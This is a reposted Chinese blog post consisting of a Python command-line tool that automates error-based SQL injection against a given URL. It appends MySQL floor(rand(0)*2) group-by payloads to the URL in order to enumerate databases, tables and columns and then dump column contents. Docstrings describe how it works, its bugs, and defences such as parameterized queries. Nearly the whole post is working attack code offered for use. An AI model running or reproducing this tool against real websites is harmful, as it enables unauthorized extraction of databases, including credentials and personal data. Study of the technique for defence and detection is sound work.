sql注入半自动化扫描工具——报错注入(分析后续补上)

代码展示墙:
关于注释和解析以后会补上
现在只是先将代码保存在这里


# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
import re
parser=OptionParser()
parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
(options,args) = parser.parse_args()

def main():
    """Dispatch on which command-line switches were supplied.

    With no switches at all, print a hint plus the option help and exit.
    Otherwise the exact combination of -U/-D/-T/-C selects one of the four
    lookup functions; any other combination (for example -D without -U, or
    -C without -T) matches no branch and does nothing. Reads the
    module-level `options` and `parser` created at import time.
    """
    have_url = options.url is not None
    have_db = options.database is not None
    have_table = options.table is not None
    have_column = options.column is not None

    if not (have_url or have_db or have_table or have_column):
        print("Please read the help")
        parser.print_help()
        sys.exit()

    given = (have_url, have_db, have_table, have_column)
    if given == (True, False, False, False):
        getAllDatabases(options.url)
    elif given == (True, True, False, False):
        getAllTables(options.url, options.database)
    elif given == (True, True, True, False):
        getAllColumnsByTable(options.url, options.table, options.database)
    elif given == (True, True, True, True):
        getAllContent(options.url, options.column, options.table, options.database)
def http_get(url):
    """Issue a plain GET for `url` and return the raw response body.

    The return value is `Response.content` (bytes). No timeout, custom
    headers, session reuse or status-code check are applied, so a slow or
    failing target blocks the caller indefinitely.
    """
    response = requests.get(url)
    return response.content

def getAllDatabases(url):
 """Print every schema name reachable through an error-based injection point.

 Two payload shapes are appended verbatim to `url`: one that wraps
 `count(schema_name)` from information_schema.schemata, then one per index
 that wraps a single `schema_name` selected with `limit %d,1`. Each wrapped
 value sits between '^_^' markers so it can be cut out of the page with one
 regex. The approach only works when the application echoes the database
 error text back into the HTTP response; not exposing raw database errors
 and using parameterized queries both remove the channel, and the
 `floor(rand(0)*2)` / `group by` pair is a well-known signature for this
 payload family in WAF and log-based detection.
 """
 # Count query: the value of interest is the count(schema_name) sub-select;
 # user() is merely concatenated into the grouping expression.
 db_number_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(schema_name),'^_^') from information_schema.schemata),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) "
 html=http_get(db_number_payload)
 # http_get returns bytes; under Python 3 str() yields the b'...' repr and the
 # regex runs on that repr (under Python 2 it is the body itself).
 htmlc=str(html)
 # re.search returns None when the markers are absent, so .group(1) raises
 # AttributeError; int() raises ValueError if the captured text is not numeric.
 db_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc,re.M).group(1))
 for i in range(db_number):
  # One round-trip per schema name; `limit %d,1` selects the i-th row.
  db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',schema_name,'^_^') from information_schema.schemata limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
  db_name_get=http_get(db_name_payload)
  db_name_res=str(db_name_get)
  # Non-greedy match between the first pair of '^_^' markers in the page.
  db_name_res_re=re.search(r'\^_\^(.*?)\^_\^',db_name_res,re.M)
  db_name=db_name_res_re.group(1)
  print(db_name)
def getAllTables(url,database):
 """Print every table name in `database` via the same error-based channel.

 Same two-phase shape as getAllDatabases: a count of table_name rows in
 information_schema.tables filtered by `table_schema='<database>'`, then one
 request per index with `limit %d,1`. `database` is interpolated into the
 SQL text with %s and no quoting or escaping, so it is trusted input here.
 Unlike getAllDatabases, the regex calls below pass no re.M flag.
 """
 db_table_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(table_name),'^_^') from information_schema.tables where table_schema='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % database
 # Bytes body converted with str(); see the note in getAllDatabases.
 html=str(http_get(db_table_payload))
 # .group(1) on a None match raises AttributeError if the markers are absent.
 db_table_number=int(re.search(r'\^_\^(.*?)\^_\^',html).group(1))
 for i in range(db_table_number):
  # One request per table name; the tuple fills the schema filter and the offset.
  db_name_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',table_name,'^_^') from information_schema.tables where table_schema='%s' limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (database,i)
  htmlc=str(http_get(db_name_payload))
  db_table_name=re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1)
  print(db_table_name)
def getAllColumnsByTable(url,table,database):
 """Print every column name of `table` via the same error-based channel.

 Count phase, then one request per index with `limit %d,1`, exactly as in
 getAllTables. Note that `database` is accepted but never used: the filter is
 `where table_name='<table>'` only, so columns of identically named tables in
 other schemas are counted and listed as well. `table` is interpolated with
 %s and no quoting or escaping.
 """
 db_cl_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(column_name),'^_^') from information_schema.columns where table_name='%s'),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % table
 # Bytes body converted with str(); see the note in getAllDatabases.
 htmlc=str(http_get(db_cl_payload))
 # .group(1) on a None match raises AttributeError if the markers are absent.
 db_cl_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
 # The loop bound is the count extracted above; it is not printed.
 for i in range(db_cl_number):
  # One request per column name; the tuple fills the table filter and the offset.
  db_cl_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',column_name,'^_^') from information_schema.columns where table_name='%s'  limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (table,i)
  html_cl=str(http_get(db_cl_name_payload))
  db_cl_name=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
  print(db_cl_name)
def getAllContent(url,column,table,database):
 """Print every value of `column` in `database`.`table` via the error channel.

 Count phase (`count(<column>) from <database>.<table>`), then one request
 per index with `limit %d,1`. All three identifiers are interpolated into
 the SQL text with %s, unquoted and unescaped, so they are trusted input.
 Each printed value is whatever sits between the first pair of '^_^'
 markers in the echoed error text.
 """
 db_ct_payload=url +" and (select 1 from (select count(*),concat((select concat('^_^',count(%s),'^_^') from %s.%s),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table)
 # Bytes body converted with str(); see the note in getAllDatabases.
 htmlc=str(http_get(db_ct_payload))
 # .group(1) on a None match raises AttributeError if the markers are absent.
 db_ct_number=int(re.search(r'\^_\^(.*?)\^_\^',htmlc).group(1))
 for i in range(db_ct_number):
  # One request per row; the tuple fills column, schema, table and the offset.
  db_ct_name_payload=url + " and (select 1 from (select count(*),concat((select concat('^_^',%s,'^_^') from %s.%s limit %d,1),concat(floor(rand(0)*2),user()))x from information_schema.tables group by x)a) " % (column,database,table,i)
  html_cl=str(http_get(db_ct_name_payload))
  db_ct_string=re.search(r'\^_\^(.*?)\^_\^',html_cl).group(1)
  print(db_ct_string)
# Entry point. Runs unconditionally at import time (no `if __name__ == "__main__"`
# guard), so importing this module as a library would also trigger the requests.
main()


转载自blog.csdn.net/sdb5858874/article/details/80656205